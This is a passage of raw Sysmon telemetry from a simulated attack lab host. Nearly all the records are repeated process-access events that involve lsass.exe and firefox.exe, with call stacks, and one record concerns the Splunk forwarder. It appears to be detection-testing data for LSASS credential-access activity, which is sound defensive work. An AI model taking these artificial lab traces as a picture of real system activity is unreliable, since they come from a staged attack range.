Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 10341000x800000000000000042369Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.400{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042368Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.400{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042367Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.399{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042366Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.399{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042365Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.399{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042364Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.399{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042363Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.399{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042362Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.399{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042361Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.398{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042360Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.398{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042359Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.398{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042358Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.398{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042357Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.398{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042356Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.397{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042355Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.397{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042354Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.397{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042353Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.397{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000042352Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.397{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F98393C36F32FF4DF9906202BD7E5EBD,SHA256=26399024776E355F02AA74D037E90C57F387F18C260F38D383017BF2C885AF63,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000042351Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.397{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042350Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.397{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042349Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.396{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042348Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.396{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042347Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.396{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042346Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.396{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla 